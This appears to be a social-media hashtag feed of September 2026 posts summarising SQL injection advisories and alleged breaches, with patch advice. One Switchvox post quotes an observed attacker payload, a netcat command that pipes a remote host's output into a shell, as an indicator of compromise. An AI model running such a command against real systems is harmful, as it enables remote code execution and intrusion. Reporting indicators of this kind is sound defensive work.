#SQLInjection
September 25, 2026 at 12:23 PM
Roundcube Webmail is affected by CVE-2026-48842, a high-severity unauthenticated SQL injection in virtuser_query. Exploitation can expose messages, address books, and user identities. #Roundcube #SQLInjection #CVE202648842
Roundcube Webmail Vulnerability In Attackers’ Crosshairs
Threat actors are exploiting a high-severity Roundcube flaw, tracked as CVE-2026-48842, which enables unauthenticated SQL injection through the virtuser_query plugin. Successful attacks can expose messages, address books, user identities, and other sensitive database content, prompting Roundcube to release fixes in versions 1.6.16 and 1.7.1. #Roundcube #CVE-2026-48842 #virtuser_query...
www.hendryadrian.com
September 25, 2026 at 9:00 AM
September 24, 2026 at 8:32 AM
Alleged Generation Tux customer data is being sold by seraphims, claiming 2.8M+ records from an August 2026 breach via auth-bypass SQL injection. Data may include names, emails, phones, password hashes, and addresses. #GenerationTux #SQLinjection
Generation Tux Dataset Claim Covers 2.8M+ Customer Records
A forum actor named seraphims is advertising an alleged Generation Tux customer dataset with more than 2.8 million records, claiming it was taken in an August 2026 breach via authentication-bypass SQL injection. The unverified listing says the data includes names, emails, phone numbers, password hashes, and address details, and is being...
www.hendryadrian.com
September 16, 2026 at 7:45 PM
Syncope 3.0-4.1 had SQL, sandbox & JWT flaws letting admins escalate access—upgrade to 4.0.8/4.1.3 now. #SecurityNews #IdentityManagement #ApacheSyncope #CVE2026 #JWT #SQLInjection thedailytechfeed.com/apache-synco...
September 16, 2026 at 1:48 PM
SQL injection exposed in Apache Superset—read-only users can wreak havoc via sqlExpression/where. Update to 6.0.0 fast. #ApacheSuperset #SQLInjection #CVE2026-23980 #DataSecurity #InfoSec https://thedailytechfeed.com/poc-reveals-critical-sql-injection-in-apache-superset-cve-2026-23980/
September 16, 2026 at 11:11 AM
September 11, 2026 at 11:02 AM
Critical SQL injection in cPanel EmailTrack allows root takeover by users with mail access. Patch now. #cPanel #SQLInjection #Cybersecurity #ServerSecurity #CVE2026 #RootAccess https://thedailytechfeed.com/critical-cpanel-sql-injection-lets-attackers-grab-root-access/
September 9, 2026 at 9:18 AM
Switchvox Vulnerability Triggers Active Exploitation Risk #CVE20269586 #SQLInjection #Switchvox
Switchvox Vulnerability Triggers Active Exploitation Risk
 Sangoma Switchvox CVE-2026-9586 is a serious unauthenticated SQL injection flaw that can lead to remote code execution, and Horizon3 says it has already seen real-world exploitation attempts. The issue was patched in Switchvox 8.4.0.2, making rapid remediation important for exposed systems.  Horizon3’s research says Switchvox is an enterprise VoIP management platform used for voicemail, call forwarding, monitoring, and analytics. The vulnerability sits in an unauthenticated HTTP endpoint handled by PhoneAppsHandler.pm, where XML input is parsed and the PhoneIP field is inserted directly into a SQL query without validation.  That weak input handling can let an attacker inject SQL into the backend, and the blog describes how the query executes with PostgreSQL superuser privileges. Horizon3 notes that this design makes exploitation especially dangerous because the flaw can progress from a single request to code execution on the device.  The post also highlights indicators of compromise, including activity in /var/log/switchvox/db-quirks.log. In one observed case, attackers used a payload involving nc 176.65.148.184 39323 | sh, then followed up with commands to enumerate processes and exfiltrate results through a remote server.  The disclosure timeline shows Horizon3 reported the issue on 10 April 2026, Sangoma released the fix on 14 July 2026, and Defused Cyber honeypots recorded valid exploitation on 30 August 2026. Horizon3 also says Shodan showed roughly 4,000 internet-exposed Switchvox devices, which suggests a broad attack surface for organizations that have not patched yet.  Safety recommendations  Upgrade immediately to Switchvox 8.4.0.2 or a later supported release, since that version contains the fix for CVE-2026-9586. If patching cannot happen right away, restrict access to the Switchvox web interface and /pa endpoint with firewalls, VPNs, and network segmentation, and avoid direct internet exposure. Security teams should also review /var/log/switchvox/db-quirks.log, inspect outbound traffic for suspicious connections, and investigate any indicators tied to the observed attacker IP.
dlvr.it
September 5, 2026 at 4:57 PM
Over 3 million WordPress websites may be exposed to a serious security vulnerability in the All-in-One WP Migration and Backup plugin.

#Cybersecurity #WordPress #Vulnerability #WebSecurity #ApplicationSecurity #SQLInjection #RCE #InfoSec #PatchManagement

www.securityweek.com/over-3-milli...
Over 3 Million WordPress Sites Affected by Migration Plugin Vulnerability
Second-order SQL injection flaw (CVE-2026-19949) in the All-in-One WP Migration and Backup plugin can be exploited for complete site compromise.
www.securityweek.com
September 5, 2026 at 6:12 AM
Alduin claims a union-based SQL injection exposed AMF data, including town hall logins and plaintext passwords, plus about 114,000 subscriber records. The breach is unverified. #France #SQLInjection #TownHall
AMF Data Leaked With Plaintext Passwords For Town Hall Accounts
A forum actor posting as Alduin claims to have leaked data from amf.asso.fr, the Association des Maires de France, after a union-based SQL injection. The alleged breach includes town hall login addresses and plaintext passwords, along with official subscriber and account data, but the claim remains unverified. #Alduin #AssociationdesMairesdeFrance #amfasso.fr #SQLinjection...
www.hendryadrian.com
September 5, 2026 at 2:45 AM
Sangoma Switchvox is being exploited in the wild via an unauthenticated SQL injection flaw offering remote code execution. Just another Tuesday in IT support.

#SQLInjection #SameOldStory
September 4, 2026 at 5:21 PM
September 3, 2026 at 5:52 PM
CVE-2026-19949 in All-in-One WP Migration and Backup may affect 3.2M WordPress sites. A second-order SQL injection in archive restore could enable RCE via trackbacks; only 35% are patched to 7.110. #WordPress #CVE202619949 #SQLInjection
Over 3 Million WordPress Sites Affected By Migration Plugin Vulnerability
A high-severity flaw in the All-in-One WP Migration and Backup WordPress plugin, tracked as CVE-2026-19949, can let attackers trigger remote code execution by abusing a second-order SQL injection during archive restore operations. The issue affects versions up to 7.109, and with only 35% of installations updated to 7.110, about 3.2 million...
www.hendryadrian.com
September 3, 2026 at 11:45 AM
A SQL injection flaw in WP’s All-in-One Migration plugin threatens 5M+ sites—upgrade to 7.110 and audit comments. #WordPress #Security #SQLInjection #PluginVuln #Cybersecurity #WPBackup https://thedailytechfeed.com/critical-sql-injection-bug-in-wp-migration-plugin-threatens-5m-sites/
September 3, 2026 at 11:27 AM
High-severity SQL injection in All-in-One WP Migration and Backup can let unauthenticated attackers gain remote code execution and take over WordPress sites. Fixed in 7.110 after disclosure. #WordPress #SQLInjection #CVE202619949
WordPress Backup Plugin Flaw Exposes Millions Of Sites To Takeover Attacks
A high-severity SQL injection flaw in the All-in-One WP Migration and Backup plugin can let unauthenticated attackers achieve remote code execution and take over WordPress sites. The issue, tracked as CVE-2026-19949, affects versions through 7.109 and was fixed by ServMask in version 7.110 after disclosure by Wordfence and researcher Jack Taylor. #CVE-2026-19949 #All-in-OneWPMigrationandBackup #Wordfence #ServMask #JackTaylor
www.hendryadrian.com
September 2, 2026 at 10:15 PM
5 millones de sitios WP afectados por SQL injection

All-in-One WP Migration vulnerabilidad CVE-2026-19949 expone 5 millones de sitios WordPress. Verificá si tu versión está afectada y actualizá en 2 minutos.

#sqlinjection #allinonewpmigration #cve202619949 #wordpressplugins #seguridadwordpress
5 millones de sitios WP afectados por SQL injection - Seguridad en Wordpress
CVE-2026-19949 en All-in-One WP Migration expone 5 millones de sitios WordPress a inyección SQL de segundo orden sin autenticación. Actualizá a la versión 7.110.
seguridadenwordpress.com
September 1, 2026 at 5:28 PM
August 28, 2026 at 1:17 PM